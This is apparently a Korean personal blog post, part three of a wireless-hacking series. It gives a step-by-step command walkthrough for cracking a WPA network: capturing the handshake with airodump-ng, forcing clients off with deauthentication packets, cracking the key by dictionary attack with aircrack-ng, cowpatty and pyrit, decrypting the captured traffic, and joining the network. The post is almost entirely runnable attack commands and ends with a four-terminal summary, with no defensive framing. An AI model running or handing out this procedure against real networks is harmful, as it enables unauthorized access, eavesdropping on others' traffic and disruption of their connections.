Notice»

Recent Post»

Recent Comment»

Recent Trackback»

Archive»

« 2024/5 »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

무선랜 해킹 (3) WPA 크랙 및 연결

Network | 2012. 12. 13. 21:39 | Posted by binaryU

* airodump-ng --bssid 00:00:00:00:00:00 --channel 11 --write WPACracking mon0

  - WPACracking으로 시작하는 파일로 패킷 캡쳐 (cap,csv,xor,kismet.csv,kismet.netxml)

  - WPA handshake: 00:00:00:00:00:00  문구가 나올 때 까지 대기 또는 인젝션


* aireplay-ng --deauth 1 -a 00:00:00:00:00:00 mon0

  - 인증해제 패킷을 브로드캐싕해서 클라이언트 재연결을 유발한다.


* aircrack-ng WPACracking-01.cap -w /pentest/passwords/wordlists/darkc0de.lst

  - Dictionary Attack용 사전파일을 이용하여 WPA 크랙 (사전에 있는 경우만 크랙 가능)

  - 비교: Cowpatty도 사전파일을 이용한 WPA 크랙 도구


* genpmk -f darkc0de.lst -d PMK-binaryU -s "binaryU"

  - 사전파일을 binaryU라는 SSID의 값으로 미리 PMK(Pairwise Master Key)를 계산한다.


* cowpatty -d PMK-binaryU -s "binaryU" -r WPACracking-01.cap

  - 미리 계산된 PMK인 PMK-binaryU 파일을 이용하여 WPA 크랙

  - 사전에 있는 경우, aircrack-ng으로 직접 크랙시 수 십분 걸릴 내용이 수 초내에 크랙


* airolib-ng PMK-aircrack --import cowpatty PMK-binaryU

  - genmpk에서 생성된 PMK를 이용하여 WPA 크랙


* aircrack-ng -r PMK-aircrack WPACracking-01.cap

  - airolib-ng에서 변환된 PMK를 이용하여 WPA 크랙


* pyrit -r WPACracking-01.cap -i PMK-binaryU attack_cowpatty

  - genpmk로 생성된 PMK로 WPA를 크랙 (멀티 CPU 시스템을 활용하여 속도 증가)


* airdecap-ng -p abcdefgh WPACracking-01.cap -e "binaryU"

  - 크랙한 WPA키(abcdefgh)와 SSID(binaryU)를 이용한 캡쳐파일 복호화


* wpa_passphrase binaryU abcdefgh > wpa_supp.conf

  - ssid를 binaryU로 하고, psk를 암호화된 abcdefgh로 설정된 wpa_supp.conf 파일 생성


* vi wpa_supp.conf
  - network={
ssid="binaryU"
key_mgmt=WPA-PSK
proto=WPA
pairwise=TKIP
group=TKIP
psk=<wpa_passphrase로 암호화된 비밀번호>
    }

* wpa_supplicant -Dwext -iwlan1 -cwpa_supp.conf

  - 크랙한 WPA키(abcdefgh)와 SSID(binaryU)를 이용한 AP 연결


* dhclient3

  - ip 동적 할당 및 dns 동적 설정


** 최종정리 4 터미널 **

===========================================================================

A터미널 : airodump-ng mon0

A터미널 : airodump-ng --bssid 00:00:00:00:00:00 --channel 11 --write WPACracking mon0

B터미널 : aireplay-ng --deauth 1 -a 00:00:00:00:00:00 mon0

C터미널 : aircrack-ng WPACracking-01.cap -w /pentest/passwords/wordlists/darkc0de.lst

D터미널 : aircrack-ng WPACracking-01.cap -w /pentest/passwords/wordlists/rockyou.txt

===========================================================================

: